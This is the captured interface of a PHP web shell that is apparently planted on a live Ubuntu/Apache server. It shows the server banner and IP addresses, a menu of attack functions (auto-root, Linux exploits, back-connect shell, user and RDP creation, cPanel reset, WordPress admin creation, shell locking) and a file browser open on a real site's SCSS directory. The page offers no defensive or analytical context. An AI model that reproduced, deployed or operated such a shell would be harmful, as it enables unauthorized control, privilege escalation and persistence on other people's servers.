Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.114.232
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
crm.oxopackaging.com /
resources /
sass /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap
[ DIR ]
drwxr-xr-x
bootstrap-extended
[ DIR ]
drwxr-xr-x
components
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
pages
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
themes
[ DIR ]
drwxr-xr-x
_variables.scss
138
B
-rw-r--r--
app.scss
158
B
-rw-r--r--
bootstrap-extended.scss
1.94
KB
-rw-r--r--
bootstrap.scss
352
B
-rw-r--r--
colors.scss
947
B
-rw-r--r--
components.scss
1.83
KB
-rw-r--r--
custom-laravel.scss
1.71
KB
-rw-r--r--
custom-rtl.scss
5.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : components.scss
// ================================================================================================ // File Name: components.scss // Description: Common components file to includ all theme specific custom components. // ---------------------------------------------------------------------------------------------- // Item name: Vuexy - Vuejs, HTML & Laravel Admin Dashboard Template // Author: PIXINVENT // Author URL: http://www.themeforest.net/user/pixinvent // ================================================================================================ // Variables // ------------------------------ // Core variables and mixins @import "bootstrap/functions"; @import "bootstrap/mixins"; @import "bootstrap-extended/mixins"; // Core variables and mixins overrides @import "core/variables/variables"; @import "bootstrap/variables"; // Overrides user variable @import "core/variables/components-variables"; @import "core/mixins/transitions"; // For alert box shadow // Perfect Scrollbar // Core // ------------------------------ // layouts @import "core/layouts/content"; @import "core/layouts/sidebar"; @import "core/layouts/footer"; // menu @import "core/menu/navigation"; // Components // ------------------------------ @import "components/helper"; @import "components/avatar"; @import "components/search"; @import "components/chart"; @import "components/chat-widget"; @import "components/bootstrap-social"; @import "components/demo"; // Plugins demo, remove in real project @import "components/customizer"; // Customizer demo, remove in real project @import "components/chips"; @import "components/divider"; // Plugins // ------------------------------ @import "plugins/ui/breakpoints"; // TODO:A: Set this scss page specific @import "plugins/forms/tags/basic-input"; @import "plugins/forms/select2/select2"; @import "plugins/tables/datatables";
Close